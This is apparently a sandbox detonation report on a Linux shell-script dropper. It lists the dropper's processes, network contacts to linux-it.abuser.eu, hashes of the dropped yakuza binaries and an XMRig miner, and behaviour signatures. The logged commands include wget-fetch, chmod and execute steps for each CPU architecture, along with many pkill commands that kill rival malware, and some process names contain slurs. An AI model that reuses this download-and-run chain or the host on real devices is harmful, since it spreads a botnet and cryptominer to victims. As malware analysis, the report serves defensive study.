[sh -c pkill -9 19ju3d || busybox pkill -9 19ju3d]

/usr/bin/pkill

[pkill -9 19ju3d]

/bin/busybox

[busybox pkill -9 19ju3d]

/bin/sh

[sh -c pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120]

/usr/bin/pkill

[pkill -9 SORAojkf120]

/bin/busybox

[busybox pkill -9 SORAojkf120]

/bin/sh

[sh -c pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92]

/usr/bin/pkill

[pkill -9 hehahejeje92]

/bin/busybox

[busybox pkill -9 hehahejeje92]

/bin/sh

[sh -c pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91]

/usr/bin/pkill

[pkill -9 2U2JDJA901F91]

/bin/busybox

[busybox pkill -9 2U2JDJA901F91]

/bin/sh

[sh -c pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12]

/usr/bin/pkill

[pkill -9 SlaVLav12]

/bin/busybox

[busybox pkill -9 SlaVLav12]

/bin/sh

[sh -c pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh]

/usr/bin/pkill

[pkill -9 helpmedaddthhhhh]

/bin/busybox

[busybox pkill -9 helpmedaddthhhhh]

/bin/sh

[sh -c pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq]

/usr/bin/pkill

[pkill -9 2wgg9qphbq]

/bin/busybox

[busybox pkill -9 2wgg9qphbq]

/bin/sh

[sh -c pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices]

/usr/bin/pkill

[pkill -9 Slav3Th3seD3vices]

/bin/busybox

[busybox pkill -9 Slav3Th3seD3vices]

/bin/sh

[sh -c pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ]

/usr/bin/pkill

[pkill -9 hzSmYZjYMQ]

/bin/busybox

[busybox pkill -9 hzSmYZjYMQ]

/bin/sh

[sh -c pkill -9 5Gbf || busybox pkill -9 5Gbf]

/usr/bin/pkill

[pkill -9 5Gbf]

/bin/busybox

[busybox pkill -9 5Gbf]

/bin/sh

[sh -c pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL]

/usr/bin/pkill

[pkill -9 SoRAxD123LOL]

/bin/busybox

[busybox pkill -9 SoRAxD123LOL]

/bin/sh

[sh -c pkill -9 iaGv || busybox pkill -9 iaGv]

/usr/bin/pkill

[pkill -9 iaGv]

/bin/busybox

[busybox pkill -9 iaGv]

/bin/sh

[sh -c pkill -9 5aA3 || busybox pkill -9 5aA3]

/usr/bin/pkill

[pkill -9 5aA3]

/bin/busybox

[busybox pkill -9 5aA3]

/bin/sh

[sh -c pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL]

/usr/bin/pkill

[pkill -9 SoRAxD420LOL]

/bin/busybox

[busybox pkill -9 SoRAxD420LOL]

/bin/sh

[sh -c pkill -9 insomni || busybox pkill -9 insomni]

/usr/bin/pkill

[pkill -9 insomni]

/bin/busybox

[busybox pkill -9 insomni]

/bin/sh

[sh -c pkill -9 640277 || busybox pkill -9 640277]

/usr/bin/pkill

[pkill -9 640277]

/bin/busybox

[busybox pkill -9 640277]

/bin/sh

[sh -c pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337]

/usr/bin/pkill

[pkill -9 SoraBeReppin1337]

/bin/busybox

[busybox pkill -9 SoraBeReppin1337]

/bin/sh

[sh -c pkill -9 ipcamCache || busybox pkill -9 ipcamCache]

/usr/bin/pkill

[pkill -9 ipcamCache]

/bin/busybox

[busybox pkill -9 ipcamCache]

/bin/sh

[sh -c pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q]

/usr/bin/pkill

[pkill -9 66tlGg9Q]

/bin/busybox

[busybox pkill -9 66tlGg9Q]

/bin/sh

[sh -c pkill -9 T || busybox pkill -9 T]

/usr/bin/pkill

[pkill -9 T]

/bin/busybox

[busybox pkill -9 T]

/bin/sh

[sh -c pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87]

/usr/bin/pkill

[pkill -9 jUYfouyf87]

/bin/busybox

[busybox pkill -9 jUYfouyf87]

/bin/sh

[sh -c pkill -9 6ke3 || busybox pkill -9 6ke3]

/usr/bin/pkill

[pkill -9 6ke3]

/bin/busybox

[busybox pkill -9 6ke3]

/bin/sh

[sh -c pkill -9 TOKYO3 || busybox pkill -9 TOKYO3]

/usr/bin/pkill

[pkill -9 TOKYO3]

/bin/busybox

[busybox pkill -9 TOKYO3]

/bin/sh

[sh -c pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh]

/usr/bin/pkill

[pkill -9 lyEeaXul2dULCVxh]

/bin/busybox

[busybox pkill -9 lyEeaXul2dULCVxh]

/bin/sh

[sh -c pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z]

/usr/bin/pkill

[pkill -9 93OfjHZ2z]

/bin/busybox

[busybox pkill -9 93OfjHZ2z]

/bin/sh

[sh -c pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r]

/usr/bin/pkill

[pkill -9 TY2gD6MZvKc7KU6r]

/bin/busybox

[busybox pkill -9 TY2gD6MZvKc7KU6r]

/bin/sh

[sh -c pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l]

/usr/bin/pkill

[pkill -9 mMkiy6f87l]

/bin/busybox

[busybox pkill -9 mMkiy6f87l]

/bin/sh

[sh -c pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU]

/usr/bin/pkill

[pkill -9 A023UU4U24UIU]

/bin/busybox

[busybox pkill -9 A023UU4U24UIU]

/bin/sh

[sh -c pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd]

/usr/bin/pkill

[pkill -9 TheWeeknd]

/bin/busybox

[busybox pkill -9 TheWeeknd]

/bin/sh

[sh -c pkill -9 mioribitches || busybox pkill -9 mioribitches]

/usr/bin/pkill

[pkill -9 mioribitches]

/bin/busybox

[busybox pkill -9 mioribitches]

/bin/sh

[sh -c pkill -9 A5p9 || busybox pkill -9 A5p9]

/usr/bin/pkill

[pkill -9 A5p9]

/bin/busybox

[busybox pkill -9 A5p9]

/bin/sh

[sh -c pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds]

/usr/bin/pkill

[pkill -9 TheWeeknds]

/bin/busybox

[busybox pkill -9 TheWeeknds]

/bin/sh

[sh -c pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi]

/usr/bin/pkill

[pkill -9 mnblkjpoi]

/bin/busybox

[busybox pkill -9 mnblkjpoi]

/bin/sh

[sh -c pkill -9 AbAd || busybox pkill -9 AbAd]

/usr/bin/pkill

[pkill -9 AbAd]

/bin/busybox

[busybox pkill -9 AbAd]

/bin/sh

[sh -c pkill -9 Tokyos || busybox pkill -9 Tokyos]

/usr/bin/pkill

[pkill -9 Tokyos]

/bin/busybox

[busybox pkill -9 Tokyos]

/bin/sh

[sh -c pkill -9 neb || busybox pkill -9 neb]

/usr/bin/pkill

[pkill -9 neb]

/bin/busybox

[busybox pkill -9 neb]

/bin/sh

[sh -c pkill -9 Akiru || busybox pkill -9 Akiru]

/usr/bin/pkill

[pkill -9 Akiru]

/bin/busybox

[busybox pkill -9 Akiru]

/bin/sh

[sh -c pkill -9 U8inTz || busybox pkill -9 U8inTz]

/usr/bin/pkill

[pkill -9 U8inTz]

/bin/busybox

[busybox pkill -9 U8inTz]

/bin/sh

[sh -c pkill -9 netstats || busybox pkill -9 netstats]

/usr/bin/pkill

[pkill -9 netstats]

/bin/busybox

[busybox pkill -9 netstats]

/bin/sh

[sh -c pkill -9 Alex || busybox pkill -9 Alex]

/usr/bin/pkill

[pkill -9 Alex]

/bin/busybox

[busybox pkill -9 Alex]

/bin/sh

[sh -c pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T]

/usr/bin/pkill

[pkill -9 W9RCAKM20T]

/bin/busybox

[busybox pkill -9 W9RCAKM20T]

/bin/sh

[sh -c pkill -9 newnetword || busybox pkill -9 newnetword]

/usr/bin/pkill

[pkill -9 newnetword]

/bin/busybox

[busybox pkill -9 newnetword]

/bin/sh

[sh -c pkill -9 Ayo215 || busybox pkill -9 Ayo215]

/usr/bin/pkill

[pkill -9 Ayo215]

/bin/busybox

[busybox pkill -9 Ayo215]

/bin/sh

[sh -c pkill -9 Word || busybox pkill -9 Word]

/usr/bin/pkill

[pkill -9 Word]

/bin/busybox

[busybox pkill -9 Word]

/bin/sh

[sh -c pkill -9 nloads || busybox pkill -9 nloads]

/usr/bin/pkill

[pkill -9 nloads]

/bin/busybox

[busybox pkill -9 nloads]

/bin/sh

[sh -c pkill -9 BAdAsV || busybox pkill -9 BAdAsV]

/usr/bin/pkill

[pkill -9 BAdAsV]

/bin/busybox

[busybox pkill -9 BAdAsV]

/bin/sh

[sh -c pkill -9 Wordmane || busybox pkill -9 Wordmane]

/usr/bin/pkill

[pkill -9 Wordmane]

/bin/busybox

[busybox pkill -9 Wordmane]

/bin/sh

[sh -c pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa]

/usr/bin/pkill

[pkill -9 notyakuzaa]

/bin/busybox

[busybox pkill -9 notyakuzaa]

/bin/sh

[sh -c pkill -9 Belch || busybox pkill -9 Belch]

/usr/bin/pkill

[pkill -9 Belch]

/bin/busybox

[busybox pkill -9 Belch]

/bin/sh

[sh -c pkill -9 Wordnets || busybox pkill -9 Wordnets]

/usr/bin/pkill

[pkill -9 Wordnets]

/bin/busybox

[busybox pkill -9 Wordnets]

/bin/sh

[sh -c pkill -9 obp || busybox pkill -9 obp]

/usr/bin/pkill

[pkill -9 obp]

/bin/busybox

[busybox pkill -9 obp]

/bin/sh

[sh -c pkill -9 BigN0gg0r420 || busybox pkill -9 BigN0gg0r420]

/usr/bin/pkill

[pkill -9 BigN0gg0r420]

/bin/busybox

[busybox pkill -9 BigN0gg0r420]

/bin/sh

[sh -c pkill -9 X0102I34f || busybox pkill -9 X0102I34f]

/usr/bin/pkill

[pkill -9 X0102I34f]

/bin/busybox

[busybox pkill -9 X0102I34f]

/bin/sh

[sh -c pkill -9 ofhasfhiafhoi || busybox pkill -9 ofhasfhiafhoi]

/usr/bin/pkill

[pkill -9 ofhasfhiafhoi]

/bin/busybox

[busybox pkill -9 ofhasfhiafhoi]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/sh

[sh -c pkill -9 X19I239124UIU || busybox pkill -9 X19I239124UIU]

/usr/bin/pkill

[pkill -9 X19I239124UIU]

/bin/busybox

[busybox pkill -9 X19I239124UIU]

/bin/sh

[sh -c pkill -9 oism || busybox pkill -9 oism]

/usr/bin/pkill

[pkill -9 oism]

/bin/busybox

[busybox pkill -9 oism]

/bin/sh

[sh -c pkill -9 Deported || busybox pkill -9 Deported]

/usr/bin/pkill

[pkill -9 Deported]

/bin/busybox

[busybox pkill -9 Deported]

/bin/sh

[sh -c pkill -9 XSHJEHHEIIHWO || busybox pkill -9 XSHJEHHEIIHWO]

/usr/bin/pkill

[pkill -9 XSHJEHHEIIHWO]

/bin/busybox

[busybox pkill -9 XSHJEHHEIIHWO]

/bin/sh

[sh -c pkill -9 olsVNwo12 || busybox pkill -9 olsVNwo12]

/usr/bin/pkill

[pkill -9 olsVNwo12]

/bin/busybox

[busybox pkill -9 olsVNwo12]

/bin/sh

[sh -c pkill -9 DeportedDeported || busybox pkill -9 DeportedDeported]

/usr/bin/pkill

[pkill -9 DeportedDeported]

/bin/busybox

[busybox pkill -9 DeportedDeported]

/bin/sh

[sh -c pkill -9 XkTer0GbA1 || busybox pkill -9 XkTer0GbA1]

/usr/bin/pkill

[pkill -9 XkTer0GbA1]

/bin/busybox

[busybox pkill -9 XkTer0GbA1]

/bin/sh

[sh -c pkill -9 onry0v03 || busybox pkill -9 onry0v03]

/usr/bin/pkill

[pkill -9 onry0v03]

/bin/busybox

[busybox pkill -9 onry0v03]

/bin/sh

[sh -c pkill -9 FortniteDownLOLZ || busybox pkill -9 FortniteDownLOLZ]

/usr/bin/pkill

[pkill -9 FortniteDownLOLZ]

/bin/busybox

[busybox pkill -9 FortniteDownLOLZ]

/bin/sh

[sh -c pkill -9 Y0urM0mGay || busybox pkill -9 Y0urM0mGay]

/usr/bin/pkill

[pkill -9 Y0urM0mGay]

/bin/busybox

[busybox pkill -9 Y0urM0mGay]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:80 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
US 1.1.1.1:53 linux-it.abuser.eu udp
IT 95.234.158.87:21 linux-it.abuser.eu tcp
IT 95.234.158.87:56121 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp
IT 95.234.158.87:6780 linux-it.abuser.eu tcp

Files

/tmp/yakuza.mips

MD5 371732a722f576ce663cf832412521a8
SHA1 7d8f25bfc26af545c568ffc5c0afe8c4cd35de40
SHA256 11bd15eeca11f8fcb46cce41f4387505027446b5ba8774d2b7bd759bcdb1b9d0
SHA512 c2174eeaf058a5d78d2bb7e417373c56d5b407072de68aaae33c690fd14b93a033ef4aeb18f9a364541e51b6cfc0a28c93efbb4a1857a15b875d420e9886c014

/tmp/xmrig

MD5 8f4fff0ded94f1141768220906abfbb8
SHA1 ea7c97294f415dc8713ac8c280b3123da62f6e56
SHA256 b0e1ae6d73d656b203514f498b59cbcf29f067edf6fbd3803a3de7d21960848d
SHA512 0096072a1482f8e7999867baa3dd6e96d51591e9f7645c9ff276b53984957025c83e1fe52e5c4f55639eeed2bdbd80bbd57d7dacd84468ce09c834e39dfc4bee

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 02:41

Reported

2024-11-24 02:43

Platform

debian9-mipsel-20240611-en

Max time kernel

150s

Max time network

152s

Command Line

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/yakuza.mips /tmp/yakuza.mips N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/153/status /usr/bin/pkill N/A
File opened for reading /proc/16/status /usr/bin/pkill N/A
File opened for reading /proc/674/status /usr/bin/pkill N/A
File opened for reading /proc/956/status /usr/bin/pkill N/A
File opened for reading /proc/702/cmdline /usr/bin/pkill N/A
File opened for reading /proc/82/status /usr/bin/pkill N/A
File opened for reading /proc/9/status /usr/bin/pkill N/A
File opened for reading /proc/120/status /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/77/status /usr/bin/pkill N/A
File opened for reading /proc/666/cmdline /usr/bin/pkill N/A
File opened for reading /proc/120/status /usr/bin/pkill N/A
File opened for reading /proc/119/status /usr/bin/pkill N/A
File opened for reading /proc/666/status /usr/bin/pkill N/A
File opened for reading /proc/18/cmdline /usr/bin/pkill N/A
File opened for reading /proc/701/status /usr/bin/pkill N/A
File opened for reading /proc/10/cmdline /usr/bin/pkill N/A
File opened for reading /proc/77/status /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/743/status /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/325/cmdline /usr/bin/pkill N/A
File opened for reading /proc/740/cmdline /usr/bin/pkill N/A
File opened for reading /proc/77/status /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/335/status /usr/bin/pkill N/A
File opened for reading /proc/13/status /usr/bin/pkill N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/73/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/414/status /usr/bin/pkill N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/241/status /usr/bin/pkill N/A
File opened for reading /proc/325/cmdline /usr/bin/pkill N/A
File opened for reading /proc/674/status /usr/bin/pkill N/A
File opened for reading /proc/241/status /usr/bin/pkill N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/71/status /usr/bin/pkill N/A
File opened for reading /proc/329/status /usr/bin/pkill N/A
File opened for reading /proc/119/cmdline /usr/bin/pkill N/A
File opened for reading /proc/702/cmdline /usr/bin/pkill N/A
File opened for reading /proc/36/status /usr/bin/pkill N/A
File opened for reading /proc/68/cmdline /usr/bin/pkill N/A
File opened for reading /proc/676/cmdline /usr/bin/pkill N/A
File opened for reading /proc/11/status /usr/bin/pkill N/A
File opened for reading /proc/697/cmdline /usr/bin/pkill N/A
File opened for reading /proc/74/cmdline /usr/bin/pkill N/A
File opened for reading /proc/120/status /usr/bin/pkill N/A
File opened for reading /proc/974/status /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/703/cmdline /usr/bin/pkill N/A
File opened for reading /proc/71/status /usr/bin/pkill N/A
File opened for reading /proc/1042/cmdline /usr/bin/pkill N/A
File opened for reading /proc/674/status /usr/bin/pkill N/A
File opened for reading /proc/78/status /usr/bin/pkill N/A
File opened for reading /proc/10/cmdline /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/72/status /usr/bin/pkill N/A
File opened for reading /proc/701/cmdline /usr/bin/pkill N/A
File opened for reading /proc/119/status /usr/bin/pkill N/A
File opened for reading /proc/18/status /usr/bin/pkill N/A
File opened for reading /proc/740/cmdline /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/sh N/A
N/A N/A /usr/bin/pkill N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yakuza.x86 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.m68k /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm4 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm5 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mipsel /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i686 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.ppc /usr/bin/wget N/A
File opened for modification /tmp/S�@@p�~@8 /bin/sh N/A
File opened for modification /tmp/yakuza.sh /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm7 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.sparc /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/curl N/A
File opened for modification /tmp/yakuza.mips /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm6 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i586 /usr/bin/wget N/A

Processes

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/bin/sh

[sh -c pkill -9 902i13 || busybox pkill -9 902i13]

/usr/bin/pkill

[pkill -9 902i13]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/busybox

[busybox pkill -9 902i13]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/sh

[sh -c pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/pkill

[pkill -9 HOHO-LUGO7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/busybox

[busybox pkill -9 HOHO-LUGO7]

/bin/sh

[sh -c pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL]

/usr/bin/pkill

[pkill -9 HOHO-U79OL]

/bin/busybox

[busybox pkill -9 HOHO-U79OL]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/sh

[sh -c pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87]

/usr/bin/pkill

[pkill -9 JuYfouyf87]

/bin/busybox

[busybox pkill -9 JuYfouyf87]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

